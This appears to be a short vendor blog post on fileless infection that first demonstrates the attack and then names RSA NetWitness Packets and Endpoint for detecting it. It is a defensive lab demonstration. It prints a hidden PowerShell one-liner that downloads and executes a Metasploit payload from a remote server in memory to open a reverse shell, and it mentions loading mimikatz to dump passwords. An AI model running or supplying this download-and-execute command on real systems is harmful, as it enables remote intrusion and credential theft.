Fileless infection is a method used to compromise a system without writing any file to disk. This allows to remain stealthy and avoid detection from some antiviruses, EPP and EDR solutions that are file based for detection.
We will look at:
- How to perform the attack
- How to detect it with RSA NetWitness
Testing the Attack
We can now execute the payload:
To gain reverse shell on the victim, we just need to execute the following command (no malware installed, nothing will be written on disk, it will all happen from memory) by replacing the URL at the end with the one provided in the output of Metasploit under “Local IP” (with your IP address and the correct randomly generated filename):
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring(‘http://192.168.1.3:8080/VpBSRDO');
We can now see that we have an active session in Metasploit.
We could then load mimikatz in memory to dump passwords, without touching the disk.
session -i 1
Visibility and detection of such attacks is possible using RSA NetWitness Packets and RSA NetWitness Endpoint.
Using RSA NetWitness Packets
Using RSA NetWitness Endpoint
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.